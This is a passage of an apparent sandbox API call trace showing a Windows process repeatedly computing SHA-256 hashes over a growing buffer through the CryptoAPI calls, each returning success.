(hHash=0x3396f4a0) returned 1 [0187.724] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0187.724] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0187.724] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.724] CryptHashData (hHash=0x3396f2e0, pbData=0x32348160, dwDataLen=0xaa0, dwFlags=0x0) returned 1 [0187.724] CryptGetHashParam (in: hHash=0x3396f2e0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.724] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88e00 [0187.724] CryptGetHashParam (in: hHash=0x3396f2e0, dwParam=0x2, pbData=0x32e88e00, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88e00, pdwDataLen=0xce51c) returned 1 [0187.724] CryptDestroyHash (hHash=0x3396f2e0) returned 1 [0187.724] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0187.724] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822ad0) returned 1 [0187.725] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.725] CryptHashData (hHash=0x3396f580, pbData=0x32348160, dwDataLen=0xac0, dwFlags=0x0) returned 1 [0187.725] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.725] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88860 [0187.725] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x2, pbData=0x32e88860, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88860, pdwDataLen=0xce51c) returned 1 [0187.725] CryptDestroyHash (hHash=0x3396f580) returned 1 [0187.725] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0187.725] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338226d0) returned 1 [0187.726] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.726] CryptHashData (hHash=0x3396f4a0, pbData=0x32348160, dwDataLen=0xae0, dwFlags=0x0) returned 1 [0187.726] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.726] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e888c0 [0187.726] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e888c0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e888c0, pdwDataLen=0xce51c) returned 1 [0187.726] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0187.726] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0187.726] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822fd0) returned 1 [0187.726] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.726] CryptHashData (hHash=0x3396f900, pbData=0x32348160, dwDataLen=0xb00, dwFlags=0x0) returned 1 [0187.726] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.726] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88bc0 [0187.726] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x2, pbData=0x32e88bc0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88bc0, pdwDataLen=0xce51c) returned 1 [0187.727] CryptDestroyHash (hHash=0x3396f900) returned 1 [0187.727] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0187.727] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822dd0) returned 1 [0187.727] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.727] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0xb20, dwFlags=0x0) returned 1 [0187.727] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.727] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88320 [0187.727] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x2, pbData=0x32e88320, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88320, pdwDataLen=0xce51c) returned 1 [0187.727] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0187.727] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0187.727] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822fd0) returned 1 [0187.728] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.728] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0xb40, dwFlags=0x0) returned 1 [0187.728] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.728] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88380 [0187.728] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x2, pbData=0x32e88380, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88380, pdwDataLen=0xce51c) returned 1 [0187.728] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0187.728] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0187.728] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338229d0) returned 1 [0187.728] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.729] CryptHashData (hHash=0x3396f190, pbData=0x32348160, dwDataLen=0xb60, dwFlags=0x0) returned 1 [0187.729] CryptGetHashParam (in: hHash=0x3396f190, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.729] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88530 [0187.729] CryptGetHashParam (in: hHash=0x3396f190, dwParam=0x2, pbData=0x32e88530, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88530, pdwDataLen=0xce51c) returned 1 [0187.729] CryptDestroyHash (hHash=0x3396f190) returned 1 [0187.729] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0187.729] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0187.729] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.729] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0xb80, dwFlags=0x0) returned 1 [0187.729] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.729] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88dd0 [0187.729] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32e88dd0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88dd0, pdwDataLen=0xce51c) returned 1 [0187.729] CryptDestroyHash (hHash=0x3396f430) returned 1 [0187.729] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0187.729] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821fd0) returned 1 [0187.730] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.730] CryptHashData (hHash=0x3396f2e0, pbData=0x32348160, dwDataLen=0xba0, dwFlags=0x0) returned 1 [0187.730] CryptGetHashParam (in: hHash=0x3396f2e0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.730] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88a70 [0187.730] CryptGetHashParam (in: hHash=0x3396f2e0, dwParam=0x2, pbData=0x32e88a70, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88a70, pdwDataLen=0xce51c) returned 1 [0187.730] CryptDestroyHash (hHash=0x3396f2e0) returned 1 [0187.730] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0187.730] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338221d0) returned 1 [0187.731] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.731] CryptHashData (hHash=0x3396f120, pbData=0x32348160, dwDataLen=0xbc0, dwFlags=0x0) returned 1 [0187.731] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.731] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e884a0 [0187.731] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x2, pbData=0x32e884a0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e884a0, pdwDataLen=0xce51c) returned 1 [0187.731] CryptDestroyHash (hHash=0x3396f120) returned 1 [0187.731] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0187.731] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338222d0) returned 1 [0187.731] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.731] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0xbe0, dwFlags=0x0) returned 1 [0187.731] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.731] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88500 [0187.731] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x2, pbData=0x32e88500, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88500, pdwDataLen=0xce51c) returned 1 [0187.731] CryptDestroyHash (hHash=0x3396f660) returned 1 [0187.731] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0187.731] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822dd0) returned 1 [0187.732] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.732] CryptHashData (hHash=0x3396eda0, pbData=0x32348160, dwDataLen=0xc00, dwFlags=0x0) returned 1 [0187.732] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.732] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88e90 [0187.732] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32e88e90, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88e90, pdwDataLen=0xce51c) returned 1 [0187.732] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0187.732] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0187.732] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338231d0) returned 1 [0187.733] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.733] CryptHashData (hHash=0x3396eb00, pbData=0x32348160, dwDataLen=0xc20, dwFlags=0x0) returned 1 [0187.733] CryptGetHashParam (in: hHash=0x3396eb00, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.733] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88620 [0187.733] CryptGetHashParam (in: hHash=0x3396eb00, dwParam=0x2, pbData=0x32e88620, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88620, pdwDataLen=0xce51c) returned 1 [0187.733] CryptDestroyHash (hHash=0x3396eb00) returned 1 [0187.733] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0187.733] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338232d0) returned 1 [0187.736] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.736] CryptHashData (hHash=0x3396f580, pbData=0x32348160, dwDataLen=0xc40, dwFlags=0x0) returned 1 [0187.736] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.736] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88590 [0187.736] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x2, pbData=0x32e88590, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88590, pdwDataLen=0xce51c) returned 1 [0187.736] CryptDestroyHash (hHash=0x3396f580) returned 1 [0187.736] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0187.736] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338227d0) returned 1 [0187.736] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.736] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0xc60, dwFlags=0x0) returned 1 [0187.736] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.736] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88b30 [0187.736] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e88b30, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88b30, pdwDataLen=0xce51c) returned 1 [0187.736] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0187.737] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0187.737] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33823bd0) returned 1 [0187.737] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.737] CryptHashData (hHash=0x3396eda0, pbData=0x32348160, dwDataLen=0xc80, dwFlags=0x0) returned 1 [0187.737] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.737] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88410 [0187.737] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32e88410, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88410, pdwDataLen=0xce51c) returned 1 [0187.737] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0187.737] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0187.737] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338231d0) returned 1 [0187.738] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.738] CryptHashData (hHash=0x3396eda0, pbData=0x32348160, dwDataLen=0xca0, dwFlags=0x0) returned 1 [0187.738] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.738] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88ad0 [0187.738] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32e88ad0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88ad0, pdwDataLen=0xce51c) returned 1 [0187.738] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0187.738] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0187.738] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822dd0) returned 1 [0187.738] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.739] CryptHashData (hHash=0x3396f350, pbData=0x32348160, dwDataLen=0xcc0, dwFlags=0x0) returned 1 [0187.739] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.739] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88b00 [0187.739] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32e88b00, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88b00, pdwDataLen=0xce51c) returned 1 [0187.739] CryptDestroyHash (hHash=0x3396f350) returned 1 [0187.739] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0187.739] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338233d0) returned 1 [0187.739] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.739] CryptHashData (hHash=0x3396f5f0, pbData=0x32348160, dwDataLen=0xce0, dwFlags=0x0) returned 1 [0187.739] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.739] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88770 [0187.739] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x2, pbData=0x32e88770, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88770, pdwDataLen=0xce51c) returned 1 [0187.739] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0187.739] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0187.739] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821dd0) returned 1 [0187.740] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.740] CryptHashData (hHash=0x3396f3c0, pbData=0x32348160, dwDataLen=0xd00, dwFlags=0x0) returned 1 [0187.740] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.740] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88560 [0187.740] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x2, pbData=0x32e88560, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88560, pdwDataLen=0xce51c) returned 1 [0187.740] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0187.740] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0187.740] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822fd0) returned 1 [0187.741] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.741] CryptHashData (hHash=0x3396f4a0, pbData=0x32348160, dwDataLen=0xd20, dwFlags=0x0) returned 1 [0187.741] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.741] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e888f0 [0187.741] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e888f0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e888f0, pdwDataLen=0xce51c) returned 1 [0187.741] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0187.741] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0187.741] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338226d0) returned 1 [0187.741] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.741] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0xd40, dwFlags=0x0) returned 1 [0187.741] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.741] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e883b0 [0187.741] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e883b0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e883b0, pdwDataLen=0xce51c) returned 1 [0187.741] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0187.742] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0187.742] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338222d0) returned 1 [0187.742] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.742] CryptHashData (hHash=0x3396f580, pbData=0x32348160, dwDataLen=0xd60, dwFlags=0x0) returned 1 [0187.748] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.748] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e887a0 [0187.748] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x2, pbData=0x32e887a0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e887a0, pdwDataLen=0xce51c) returned 1 [0187.749] CryptDestroyHash (hHash=0x3396f580) returned 1 [0187.749] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0187.749] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338234d0) returned 1 [0187.749] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.749] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0xd80, dwFlags=0x0) returned 1 [0187.749] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.749] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88920 [0187.751] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e88920, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88920, pdwDataLen=0xce51c) returned 1 [0187.751] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0187.751] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0187.751] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338238d0) returned 1 [0187.752] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.752] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0xda0, dwFlags=0x0) returned 1 [0187.752] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.752] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88b60 [0187.752] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e88b60, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e88b60, pdwDataLen=0xce51c) returned 1 [0187.752] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0187.752] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0187.752] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338223d0) returned 1 [0187.753] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0187.753] CryptHashData (hHash=0x3396f820, pbData=0x32348160, dwDataLen=0xdc0, dwFlags=0x0) returned 1 [0187.753] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0187.753] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, 